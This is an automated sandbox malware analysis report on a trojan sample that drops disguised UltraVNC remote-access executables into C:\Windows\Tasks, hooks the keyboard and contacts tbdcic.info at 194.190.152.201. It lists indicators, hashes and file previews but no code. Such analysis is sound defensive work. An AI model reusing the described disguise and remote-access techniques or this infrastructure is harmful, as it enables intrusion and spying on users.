                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron22
                          Process Injection
                          Network Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                          Bootkit
                          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579876 Sample: 7q551ugrWe.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 92 54 x1.i.lencr.org 2->54 56 tbdcic.info 2->56 58 bg.microsoft.map.fastly.net 2->58 62 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 Yara detected UltraVNC Hacktool 2->66 68 4 other signatures 2->68 10 7q551ugrWe.exe 8 2->10         started        signatures3 process4 file5 42 C:\Users\user\AppData\Local\...\WPSela.LSZr7V, PE32+ 10->42 dropped 44 C:\Users\user\AppData\Local\...44fe70s.UFVVkM, PE32+ 10->44 dropped 72 Contains functionality to register a low level keyboard hook 10->72 14 cmd.exe 3 6 10->14         started        18 cmd.exe 6 10->18         started        20 cmd.exe 2 10->20         started        signatures6 process7 file8 46 C:\Windows\Tasks\sync_browser.exe, PE32+ 14->46 dropped 48 C:\Windows\Tasks\conhost.exe, PE32+ 14->48 dropped 74 Drops executables to the windows directory (C:\Windows) and starts them 14->74 22 sync_browser.exe 14->22         started        26 Acrobat.exe 20 73 14->26         started        28 taskkill.exe 1 14->28         started        36 14 other processes 14->36 50 C:\Windows\Tasks\WPSela.LSZr7V, PE32+ 18->50 dropped 52 C:\Windows\Tasks52fe70s.UFVVkM, PE32+ 18->52 dropped 30 conhost.exe 18->30         started        32 conhost.exe 18->32         started        34 conhost.exe 20->34         started        signatures9 process10 dnsIp11 60 tbdcic.info 194.190.152.201, 443, 49771, 49772 RSHB-ASRU Russian Federation 22->60 70 Contains VNC / remote desktop functionality (version string found) 22->70 38 AcroCEF.exe 109 26->38         started        signatures12 process13 process14 40 AcroCEF.exe 6 38->40         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          7q551ugrWe.exe24%ReversingLabs
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V0%ReversingLabs
                          C:\Windows\Tasks\Nfe70s.UFVVkM0%ReversingLabs
                          C:\Windows\Tasks\WPSela.LSZr7V0%ReversingLabs
                          C:\Windows\Tasks\conhost.exe0%ReversingLabs
                          C:\Windows\Tasks\sync_browser.exe0%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          tbdcic.info
                          194.190.152.201
                          truefalse
                            high
                            bg.microsoft.map.fastly.net
                            199.232.210.172
                            truefalse
                              high
                              s-part-0035.t-0009.t-msedge.net
                              13.107.246.63
                              truefalse
                                high
                                x1.i.lencr.org
                                unknown
                                unknownfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.uvnc.com7q551ugrWe.exe, 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                    high
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.11.drfalse
                                      high
                                      https://www.adobe.coReaderMessages.9.drfalse
                                        high
                                        http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=17q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                          high
                                          http://www.uvnc.comopenhttp://forum.uvnc.comnet7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                            unknown
                                            http://crl.thawte.com/ThawteTimestampingCA.crl07q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                              high
                                              http://java.sun.com/products/plugin/index.html#download7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                                high
                                                http://forum.uvnc.com7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                                  high
                                                  http://ocsp.thawte.com07q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.drfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    194.190.152.201
                                                    tbdcic.infoRussian Federation
                                                    41615RSHB-ASRUfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1579876
                                                    Start date and time:2024-12-23 13:38:46 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 48s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Run name:Run with higher sleep bypass
                                                    Number of analysed new started processes analysed:35
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:7q551ugrWe.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
                                                    Detection:MAL
                                                    Classification:mal92.troj.spyw.evad.winEXE@56/62@7/1
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:Failed
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 54.224.241.105, 50.16.47.176, 34.237.241.83, 18.213.11.84, 23.195.39.65, 199.232.210.172, 23.32.239.56, 2.19.198.27, 184.30.20.134, 23.32.239.65, 23.32.239.9, 2.19.198.16, 13.107.246.63, 23.218.208.109, 4.245.163.56
                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, azureedge-t-prod.trafficmanager.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: 7q551ugrWe.exe
                                                    No simulations
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    194.190.152.201T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                        mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                          T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                            Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                              mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                bg.microsoft.map.fastly.netOlz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                • 199.232.214.172
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                • 199.232.214.172
                                                                q8b3OisMC4.dllGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                • 199.232.210.172
                                                                Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                • 199.232.210.172
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                • 199.232.214.172
                                                                eszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                                • 199.232.210.172
                                                                0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                                • 199.232.210.172
                                                                #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                s-part-0035.t-0009.t-msedge.nethttps://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                • 13.107.246.63
                                                                G3izWAY3Fa.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                • 13.107.246.63
                                                                FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                • 13.107.246.63
                                                                mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                • 13.107.246.63
                                                                4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                • 13.107.246.63
                                                                nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.63
                                                                uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                • 13.107.246.63
                                                                dnf5RWZv2v.exeGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.63
                                                                ME3htMIepa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                • 13.107.246.63
                                                                stealcy11.exeGet hashmaliciousStealcBrowse
                                                                • 13.107.246.63
                                                                tbdcic.infoOlz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                RSHB-ASRUT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                • 194.190.152.201
                                                                Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                                • 194.190.152.129
                                                                Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                                • 194.190.152.129
                                                                document.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                                • 194.190.152.129
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                  Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                    mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                      T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                        Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                          mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VT8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                              Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                                mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                                  T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                                    Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                                      mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):290
                                                                                        Entropy (8bit):5.257773714258335
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:vYVq2PqLTwi2nKuAl9OmbnIFUt85ugZmw+5uIkwOqLTwi2nKuAl9OmbjLJ:vYVv8wZHAahFUt8wg/+wI5TwZHAaSJ
                                                                                        MD5:DA43595C86B2D1E111E7BB6943EA7BCA
                                                                                        SHA1:6668BAD69B8FE7135CF94C16BB72BD6B80EA1E8D
                                                                                        SHA-256:3617FA737D60F6E27DB28C15C0D207A933D460E0BA8B4B26F84E62356BABACD0
                                                                                        SHA-512:20BFA43FF6D9C69960949E1E6485BF597AE19B0757DC58349CCE214480868AF8418C18241652971B91977A244C66726DF4B448540D21CC34C7F49DDB297B7BEA
                                                                                        Malicious:false
                                                                                        Preview:2024/12/23-07:39:41.534 1f80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:39:41.548 1f80 Recovering log #3.2024/12/23-07:39:41.548 1f80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):290
                                                                                        Entropy (8bit):5.257773714258335
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:vYVq2PqLTwi2nKuAl9OmbnIFUt85ugZmw+5uIkwOqLTwi2nKuAl9OmbjLJ:vYVv8wZHAahFUt8wg/+wI5TwZHAaSJ
                                                                                        MD5:DA43595C86B2D1E111E7BB6943EA7BCA
                                                                                        SHA1:6668BAD69B8FE7135CF94C16BB72BD6B80EA1E8D
                                                                                        SHA-256:3617FA737D60F6E27DB28C15C0D207A933D460E0BA8B4B26F84E62356BABACD0
                                                                                        SHA-512:20BFA43FF6D9C69960949E1E6485BF597AE19B0757DC58349CCE214480868AF8418C18241652971B91977A244C66726DF4B448540D21CC34C7F49DDB297B7BEA
                                                                                        Malicious:false
                                                                                        Preview:2024/12/23-07:39:41.534 1f80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:39:41.548 1f80 Recovering log #3.2024/12/23-07:39:41.548 1f80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):334
                                                                                        Entropy (8bit):5.152428140762309
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:8q2PqLTwi2nKuAl9Ombzo2jMGIFUt8ravZZmw++87kwOqLTwi2nKuAl9Ombzo2jz:8v8wZHAa8uFUt8+h/++875TwZHAa8RJ
                                                                                        MD5:31A9FE09CE1748F0275C0C858A478811
                                                                                        SHA1:6DA15D3CFC5C06E4F98C22E25AD3B96D384E6945
                                                                                        SHA-256:D0FB0E9B34FFBC058006B5F2602BA09E86F9935EABF25D24FF2E49AD40E19857
                                                                                        SHA-512:BCEBBD5237CDDE4090AFE1DA36EFD1DE11C200A3F7FAEBD4A52029DD5E8C491A84B9292A76AC1F904F1DEE82895020D1C4FE93B9B9F98432D7A5D54E35A9BC1B
                                                                                        Malicious:false
                                                                                        Preview:2024/12/23-07:39:41.723 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:39:41.730 1c10 Recovering log #3.2024/12/23-07:39:41.731 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):334
                                                                                        Entropy (8bit):5.152428140762309
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:8q2PqLTwi2nKuAl9Ombzo2jMGIFUt8ravZZmw++87kwOqLTwi2nKuAl9Ombzo2jz:8v8wZHAa8uFUt8+h/++875TwZHAa8RJ
                                                                                        MD5:31A9FE09CE1748F0275C0C858A478811
                                                                                        SHA1:6DA15D3CFC5C06E4F98C22E25AD3B96D384E6945
                                                                                        SHA-256:D0FB0E9B34FFBC058006B5F2602BA09E86F9935EABF25D24FF2E49AD40E19857
                                                                                        SHA-512:BCEBBD5237CDDE4090AFE1DA36EFD1DE11C200A3F7FAEBD4A52029DD5E8C491A84B9292A76AC1F904F1DEE82895020D1C4FE93B9B9F98432D7A5D54E35A9BC1B
                                                                                        Malicious:false
                                                                                        Preview:2024/12/23-07:39:41.723 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:39:41.730 1c10 Recovering log #3.2024/12/23-07:39:41.731 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.975316331738347
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqNWsBdOg2HrAcaq3QYiub5P7E4TX:Y2sRdsw7dMHH3QYhbt7n7
                                                                                        MD5:BCC296E0282EA5C2641F549751BC4B0F
                                                                                        SHA1:40C152840C1528E16010297964215E8C37E31F9D
                                                                                        SHA-256:FBB5C80F64D6BF591FFA1998CE1C4F5B58664323C261A277AD98011F32194215
                                                                                        SHA-512:9AC89DE014931812FCC02F8D3C9D38679C9FB1C002B5CEA38F6547215FB812B905E2380023A41175A0962D5F9057A59B41B68FE85AE3F8C85202A18249DB6FDC
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517590452995","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":620879},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.96165270016851
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                                                        MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                                                        SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                                                        SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                                                        SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.96165270016851
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                                                        MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                                                        SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                                                        SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                                                        SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.96165270016851
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                                                        MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                                                        SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                                                        SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                                                        SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):3878
                                                                                        Entropy (8bit):5.218560714007146
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Oz82Fh+YGf6:1CDLCmPj8j0/8qKgwPHYPx8xemT8Oz8I
                                                                                        MD5:44FD678CA5A05B5D961AB608A6915579
                                                                                        SHA1:E7E5A2061057A64C4E1E8942B1029B7BB2C033FB
                                                                                        SHA-256:882A3245E05510F9A3DA80133244AF9BA764B6E7DC5B2A213FDFFD62F64AA3BB
                                                                                        SHA-512:C766E506ECF67795672B1592577F54C46A87AC000E75C217E463267643FCB9F5194B68990672F91EB457CB4454B3A0E3CA00C2C5CD5F296563136CF9FE912087
                                                                                        Malicious:false
